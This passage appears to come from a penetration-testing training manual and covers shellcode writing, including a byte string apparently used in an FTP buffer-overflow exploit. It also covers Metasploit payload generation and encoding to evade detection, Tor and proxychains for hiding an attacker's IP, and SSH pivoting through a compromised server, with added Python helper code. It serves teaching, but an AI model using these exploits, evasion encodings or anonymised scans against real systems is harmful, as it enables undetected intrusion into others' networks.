"\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"

We will modify our Perl FTP login script to fit in our JMP ESP address and our shellcode.

Execute the Perl script and see the Windows command prompt open up.


Writing Shellcode:

Objectives: At the end of this module you should be able to:

● Understand shellcode creation

● Create a simple shellcode

● Understand opcodes and the hex conversion of a binary file.

Description: Shellcode is code which, when executed on a machine, spawns a shell, giving access to a possibly remote user/attacker.

It is a single continuous string of characters that can be sent as the payload of an exploit for attacking a machine.

In this demo we will be using a simple sleep-function shellcode, which sleeps for the given time and exits.

For this to execute, we first have to find the address of the "Sleep" function in one of the Windows libraries.

We have an excellent program called dllexportviewer.exe to find any function's address.


Writing the Shellcode:

Steps:

Compile the given assembly code (sleep.asm):

[SECTION .text]
BITS 32
global _start
_start:
    xor eax, eax            ; eax = 0 without an all-zero immediate
    mov ebx, 0x7c802442     ; address of Sleep found with dllexportviewer.exe
    mov ax, 5000            ; 5000 ms; the 16-bit move keeps the immediate free of null bytes
    push eax                ; argument: dwMilliseconds
    call ebx                ; Sleep(5000); this is the final ff d3 in the opcodes below

# nasm -f bin -o sleep.bin sleep.asm

Obtain the opcodes using the xxd tool:

# xxd -i sleep.bin

0x31, 0xc0, 0xbb, 0x42, 0x24, 0x80, 0x7c, 0x66, 0xb8, 0x88, 0x13, 0x50,
0xff, 0xd3

Format it as shown in the following output by using xxd-shellcode.sh:


# ./xxd-shellcode.sh sleep.bin

\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3

Testing the Shellcode

Compile the generated shellcode, using the following program (shellcodetest.c) as a template.

Compile the program:

# gcc -o shellcodetest shellcodetest.c

Test the shellcode:

# ./shellcodetest.exe

(sleeps for 5 seconds) (then exits, and may core dump)

The shellcode string generated should not contain null bytes, as a null byte terminates the string and the program will end abruptly.

Avoiding null bytes:

● Use the XOR opcode to zero registers when needed.

● Use the AL, BL, CL, DL registers (or the 16-bit AX, BX, CX, DX, as mov ax does above) when 32 bits are not needed.

/* shellcodetest.c: shellcode test template */
char code[] = "\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;   /* treat the byte array as a function */
    (*func)();                 /* call into the shellcode */
    return 0;
}
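The null-byte rule above is easiest to see by encoding the instructions by hand. The following Python is an added example, not code from the manual: it reassembles the sleep shellcode from the fixed x86 encodings of its five instructions and checks the result against the bytes xxd-shellcode.sh printed, then shows why the listing uses xor eax,eax and mov ax rather than 32-bit moves, which would embed the 0x00 bytes the text warns about. The Sleep address 0x7c802442 is the one the manual found; the instruction encodings are standard x86 and nothing else is assumed.

```python
# The manual's sleep shellcode, exactly as xxd-shellcode.sh printed it
SLEEP_SHELLCODE = bytes.fromhex("31c0bb4224807c66b8881350ffd3")

# Fixed encodings of the instructions sleep.asm uses
XOR_EAX_EAX = b"\x31\xc0"
PUSH_EAX = b"\x50"
CALL_EBX = b"\xff\xd3"


def mov_eax_imm32(value):
    """mov eax, imm32  ->  B8 + 4-byte little-endian immediate."""
    return b"\xb8" + value.to_bytes(4, "little")


def mov_ebx_imm32(value):
    """mov ebx, imm32  ->  BB + 4-byte little-endian immediate."""
    return b"\xbb" + value.to_bytes(4, "little")


def mov_ax_imm16(value):
    """mov ax, imm16  ->  66 (operand-size prefix) B8 + 2-byte little-endian immediate."""
    return b"\x66\xb8" + value.to_bytes(2, "little")


def assemble_sleep(sleep_addr, millis):
    """Hand-assemble sleep.asm: xor eax,eax / mov ebx,Sleep / mov ax,ms / push eax / call ebx."""
    return XOR_EAX_EAX + mov_ebx_imm32(sleep_addr) + mov_ax_imm16(millis) + PUSH_EAX + CALL_EBX


def null_byte_positions(code):
    """Offsets of 0x00 bytes; a C string copy of the payload would stop at the first one."""
    return [i for i, b in enumerate(code) if b == 0]


def to_c_string(code):
    """The \\x.. form xxd-shellcode.sh emits for pasting into the C char array."""
    return "".join("\\x%02x" % b for b in code)


if __name__ == "__main__":
    code = assemble_sleep(0x7C802442, 5000)
    print("matches manual:", code == SLEEP_SHELLCODE)
    print("C string      :", to_c_string(code))
    print("nulls in mov eax,5000:", null_byte_positions(mov_eax_imm32(5000)))  # [3, 4]
    print("nulls in mov ax,5000 :", null_byte_positions(mov_ax_imm16(5000)))   # []
    print("nulls in mov eax,0   :", null_byte_positions(mov_eax_imm32(0)))     # [1, 2, 3, 4]
```

Because xor eax,eax already zeroed the upper half of the register, writing 5000 into ax leaves eax equal to 5000, so push eax still passes the right argument; that is the whole reason the 16-bit form is safe here.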


Metasploit:

The Metasploit Framework is a development platform for creating security tools and exploits.

Developed by HD Moore <[email protected]>

The framework is written in the Ruby programming language.

Components of Metasploit:

Exploits

◦ Defined as modules that use payloads.

Payloads

◦ Payloads consist of code that runs remotely.

Auxiliaries

◦ Exploits without payloads are called auxiliaries.

Encoders

◦ Encoders ensure that payloads make it to their destination.

Nops

◦ Nops keep the payload sizes consistent.

Metasploit user interfaces:

Armitage:

• Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework.

• For those who are not comfortable with using a command-line interface.

• Valuable for managing remote Metasploit instances and collaboration.


Other interfaces:

Msfweb:

◦ Launches an HTTP server and makes the framework available to be controlled from a web application.

Msfcli:

◦ Command-line interface which looks like a command prompt.

◦ For those who like CMD.exe.

MsfConsole:

◦ Console which looks more like a bash shell.

◦ Has neat formatting.

◦ Easy to use.

◦ We will be learning Metasploit in msfconsole.

Launching msfconsole:

◦ Windows: Start -> All Programs -> Metasploit -> msfconsole.

◦ BackTrack: Open your favourite shell and type msfconsole.

Booting up the framework:

Start with msfconsole -h, which shows all the commands that can be used in this console.

A console cheat sheet:

use <module>            - start configuring a module
show <options>          - show configurable options
set <varname> <value>   - set an option
exploit                 - launch an exploit module
run                     - launch a non-exploit module (auxiliary)
sessions -i <n>         - interact with session "n"
help <command>          - get help for a command

Msfencode and msfpayload are the two features of Metasploit which support the writing of custom exploits.

Msfpayload generates the necessary code for the exploit, while msfencode encodes it to keep it undetectable by protections.

msfencode -h : Display the help of msfencode

msfencode -l : List the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho): Format in which to display the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe: Uses the shikata_ga_nai encoder to encode payload.raw 5 times and exports it to a file called encoded_payload.exe

Using Metasploit payload generators:

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is the generation of shellcode for an exploit that is not currently in the Metasploit Framework, or for testing different types of shellcode and options before finalizing a module.


This tool has many different options and variables available to it, but they may not all be fully apparent given the limited output in the help banner.

These tools can be used to generate shellcode for any of the following programs. The list can be further updated or synced with exploit-db.

Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating.

In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.


• As we can see from the output, we can configure three different options with this specific payload; the output shows whether they are required, whether they come with any default settings, and a short description:

EXITFUNC

◦ Required

◦ Default setting: process

LPORT

◦ Required

◦ Default setting: 4444

RHOST

◦ Not required

◦ No default setting

Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:


Now that all of that is configured, the only option left is to specify the output type, such as C, Perl, Raw, etc.

For this example we are going to output our shellcode in Perl format:

Exercises:

o Generate Shellcode for VNC inject using msfpayload.

o Write a simple program in C which uses the above generated Shellcode as payload.


Proxies and Tunneling Techniques

Objectives: At the end of this module you should be able to hide your IP address during an attack and to tunnel through the SSH and HTTP protocols.

Proxies

Description: A proxy is an intermediate piece of software or device that forwards traffic from one system to another, so that the destination sees the proxy's address rather than the user's.

Since the end system only sees packets arriving from the previous hop, it is difficult to trace directly where the original packets came from. Note that the proxy itself sees both ends of every connection and can log them: a proxy hides you from the target, not from whoever operates the proxy.

Types of Proxies:

Tunneling Proxy: A proxy server that passes requests and responses unmodified is usually called a gateway or sometimes a tunneling proxy.

Forward Proxy: A forward proxy is an Internet-facing proxy used to retrieve content from a wide range of sources (in most cases anywhere on the Internet).

Reverse Proxy: A reverse proxy is (usually) an Internet-facing proxy used as a front end to control and protect access to a server on a private network, commonly also performing tasks such as load balancing, authentication, decryption or caching.

Protocols Supported:

HTTP

SSL

FTP

SOCKS

Tor:

Tor (The Onion Router) routes each connection through a chain of relays (three by default) before it reaches the end system. Each hop peels off one layer of encryption, like the layers of an onion, hence the name; a relay knows only the previous and the next hop, so no single relay sees both the user and the destination. The relays are run by volunteers on the Internet.

To work with Tor there are bundles that package a browser together with the Vidalia controller. For our purposes, however, the preferred way is to install tor as a service: it then opens a SOCKS listener on 127.0.0.1 port 9050 to which any SOCKS-capable program can be pointed.


Instructions for installing and usage:

To install tor as a service under Linux (Debian flavours): BackTrack does not ship the tor service and it is not available from its default repositories, but with a little configuration we can add it easily.

Open /etc/apt/sources.list and append the line

deb http://deb.torproject.org/torproject.org lucid main

(apt will warn that the repository is unsigned until the Tor Project's signing key has been imported.) Then refresh the package lists and install tor:

root@bt:~# apt-get update

root@bt:~# apt-get install tor

Start the service with the service command:

root@bt:~# service tor start

Confirm with netstat that tor is listening on 127.0.0.1:9050. To stop tor:

root@bt:~# service tor stop

Also install proxychains, a tool that forces a program's TCP connections through a chain of proxies (here the local tor SOCKS port) before they reach the target system:

root@bt:~# apt-get install proxychains

proxychains usage: prefix the command you want to run with proxychains. The proxies it uses are listed in /etc/proxychains.conf, whose default list already contains socks4 127.0.0.1 9050 for tor. It works by LD_PRELOADing a library that hooks the socket calls, so it only catches TCP connections made by dynamically linked programs; raw-socket traffic such as ICMP or SYN scans, and UDP, are not proxied and would go out from your own address.


Example: check the system's public IP address as seen by a remote site before using proxychains, then repeat the same check through proxychains. The second address is that of a Tor exit relay, not the system's own.
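What a program does when it reaches Tor through port 9050 is a SOCKS5 conversation, and it is also what proxychains performs on behalf of a program that knows nothing about proxies. The Python below is an added example, not part of the manual, that builds and parses both sides of that exchange: the client half is real and can be pointed at a running tor service, while the proxy half is a constructed toy that answers the way tor does so the handshake can be run offline. The point to notice is the address type in the CONNECT request: a host name is sent to the proxy unresolved, so the DNS lookup happens inside Tor; a tool that resolves the name itself before connecting leaks the lookup to the local resolver even though the TCP connection is proxied, which is what proxychains' proxy_dns setting and nmap's -n option are there to prevent.

```python
import socket
import struct

# SOCKS5 constants (RFC 1928). Tor's local service speaks this on 127.0.0.1:9050.
VER = 0x05
NO_AUTH, NO_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {0: "succeeded", 1: "general SOCKS server failure",
              2: "connection not allowed by ruleset", 3: "network unreachable",
              4: "host unreachable", 5: "connection refused", 6: "TTL expired",
              7: "command not supported", 8: "address type not supported"}


def greeting():
    """Client -> proxy: version 5, one method offered, no authentication."""
    return bytes([VER, 1, NO_AUTH])


def connect_request(host, port):
    """Client -> proxy: CONNECT host:port. An IPv4 literal goes as ATYP 1; anything
    else is sent as a DOMAINNAME (ATYP 3) so that the proxy resolves it. Resolving
    locally first and sending the address would leak the lookup to our own DNS server."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("host name too long for a SOCKS5 DOMAINNAME")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00]) + addr + struct.pack(">H", port)


def parse_method_selection(data):
    """Proxy -> client: the authentication method the proxy chose."""
    if len(data) != 2 or data[0] != VER:
        raise ValueError("not a SOCKS5 method selection: %r" % (data,))
    if data[1] == NO_ACCEPTABLE:
        raise ConnectionError("proxy rejected every offered authentication method")
    return data[1]


def _parse_address(data):
    """Shared decoder for the ATYP + address + port field of requests and replies."""
    atyp = data[0]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[1:5]), data[5:]
    elif atyp == ATYP_DOMAIN:
        n = data[1]
        host, rest = data[2:2 + n].decode("idna"), data[2 + n:]
    else:
        raise ValueError("unsupported address type %d" % atyp)
    return host, struct.unpack(">H", rest[:2])[0]


def parse_reply(data):
    """Proxy -> client reply to CONNECT; returns the bound (host, port) on success."""
    if len(data) < 4 or data[0] != VER:
        raise ValueError("not a SOCKS5 reply: %r" % (data,))
    if data[1] != 0:
        raise ConnectionError("CONNECT failed: %s" % REPLY_TEXT.get(data[1], data[1]))
    return _parse_address(data[3:])


def toy_proxy(message):
    """The proxy's side of the exchange, constructed here only so that the handshake
    can run offline. Tor answers a successful CONNECT with REP 0 and a zero bound
    address; this toy does the same and also returns the target it was asked to reach,
    which is the proof that name resolution happened on the proxy side."""
    if message[:1] != bytes([VER]):
        raise ValueError("client did not speak SOCKS5")
    if len(message) == 2 + message[1]:            # greeting: VER NMETHODS METHODS...
        chosen = NO_AUTH if NO_AUTH in message[2:] else NO_ACCEPTABLE
        return bytes([VER, chosen]), None
    if message[1] != CMD_CONNECT:
        return bytes([VER, 7, 0, ATYP_IPV4]) + bytes(6), None
    try:
        target = _parse_address(message[3:])
    except ValueError:
        return bytes([VER, 8, 0, ATYP_IPV4]) + bytes(6), None
    return bytes([VER, 0, 0, ATYP_IPV4]) + bytes(6), target


def walk_through(host, port):
    """Run client and toy proxy against each other; returns (target the proxy was
    asked for, bound address it reported)."""
    selection, _ = toy_proxy(greeting())
    parse_method_selection(selection)
    reply, target = toy_proxy(connect_request(host, port))
    return target, parse_reply(reply)


def open_via_tor(host, port, proxy=("127.0.0.1", 9050), timeout=60):
    """Do the same against the real tor service and return the connected socket
    (needs network access; not exercised offline). Building a fresh Tor circuit
    can take several seconds, hence the generous timeout."""
    sock = socket.create_connection(proxy, timeout)
    sock.sendall(greeting())
    parse_method_selection(sock.recv(2))
    sock.sendall(connect_request(host, port))
    parse_reply(sock.recv(262))   # longest possible reply; tor sends the 10-byte IPv4 form
    return sock
```

open_via_tor pairs with the tor service installed above on 127.0.0.1:9050; the same exchange is what proxychains injects, via its LD_PRELOAD hook, into the connect() calls of the program it wraps, which is why only programs that make ordinary TCP connections benefit from it.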


Pivoting (SSH tunneling)

Description: Pivoting means tunnelling through a machine we already control in order to reach systems on its network that we cannot access directly.

For example, the attacker (IP: 117.139.142.191) has compromised a system (IP: 49.230.123.123), say a web server, which is also connected to an internal network in the range 10.42.43.1 - 10.42.43.100 where local services or possibly load balancers are running.

The attacker cannot reach the machines on the internal network directly because of the firewall configuration. However, since the attacker has compromised the publicly reachable web server, he may be able to reach the other machines through it (IP: 49.230.123.123).

Instructions for SSH pivoting:

Since we have SSH access to the web server, we can use SSH local port forwarding (-L) to use it as our pivot. On our attacking machine we run the following command (replace <user> with the account you have on the web server):

ssh -L 127.0.0.1:4444:10.42.43.1:4444 <user>@49.230.123.123

This makes ssh listen on 127.0.0.1 port 4444 on our attacking machine. Every connection to that port is carried inside the SSH session, and the web server (IP: 49.230.123.123) opens the matching connection to 10.42.43.1 port 4444 on our behalf. The internal host therefore sees a connection from the web server, which the firewall already permits, and a client pointed at 127.0.0.1:4444 is in effect talking to 10.42.43.1:4444.

Exercises:

1. By using tor and proxychains, scan a system with NMAP and test whether the attacker's machine is indeed hidden. proxychains only intercepts TCP connect() calls, so use a connect scan with host discovery and DNS resolution disabled (nmap -sT -Pn -n); SYN scans and ICMP probes use raw sockets and would bypass the proxy, revealing your own address.

2. Configure the native browser to connect to

o SOCKS proxy (Tor or online proxies)

o HTTP proxies

Document the findings and configuration steps.
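To see what the ssh command above actually sets up, here is an added example (not from the manual) of a user-space relay in Python doing the job of the listener that `ssh -L` creates: it accepts on 127.0.0.1 and opens the onward connection to the target for every client, copying bytes in both directions. The echo server stands in for the internal host (10.42.43.1:4444 in the scenario; here it is a constructed service on a loopback port) and reports which peer address it saw, which is how you verify that the target sees the pivot rather than you. In the real pivot the onward connection is made by sshd on the web server, so the peer the internal host sees is 49.230.123.123; in this single-process stand-in it is the relay's own loopback port.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until EOF, then pass the EOF on by half-closing dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _listener(listen):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen)
    srv.listen(5)
    return srv


def start_forwarder(target, listen=("127.0.0.1", 0)):
    """Accept on `listen` and relay each connection to `target` in both directions.
    This is the role ssh plays for `ssh -L 127.0.0.1:4444:10.42.43.1:4444 ...`: the
    client owns the listener and the server end makes the outbound connection, so the
    internal host sees the pivot as the peer. Returns the bound (host, port)."""
    srv = _listener(listen)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return
            try:
                upstream = socket.create_connection(target)
            except OSError:
                client.close()   # like ssh reporting "connect failed" for that channel
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def start_echo_server(listen=("127.0.0.1", 0)):
    """Constructed stand-in for the internal service on 10.42.43.1:4444: echoes the
    request back tagged with the peer address it observed. Returns (host, port)."""
    srv = _listener(listen)

    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:
                return
            with conn:
                data = conn.recv(4096)
                conn.sendall(b"%s from %s:%d" % (data, peer[0].encode(), peer[1]))

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def through_tunnel(entry, payload):
    """Act as the tool pointed at the local end of the tunnel: send, half-close, read
    the reply. Returns (reply, our own local address) so the two can be compared."""
    with socket.create_connection(entry) as conn:
        local = conn.getsockname()
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks), local


if __name__ == "__main__":
    internal = start_echo_server()          # plays 10.42.43.1:4444
    entry = start_forwarder(internal)       # plays the listener ssh -L creates
    print(through_tunnel(entry, b"hello"))  # the peer named in the reply is the relay, not us
```

Two practical points carry over to ssh itself: the listener is bound to 127.0.0.1 unless you give another bind address, so tools on other machines cannot use your tunnel by accident; and where you need to reach many internal ports rather than one, `ssh -D` opens a SOCKS listener instead of a single forward, which proxychains (above) can be pointed at exactly as it is pointed at Tor's port 9050.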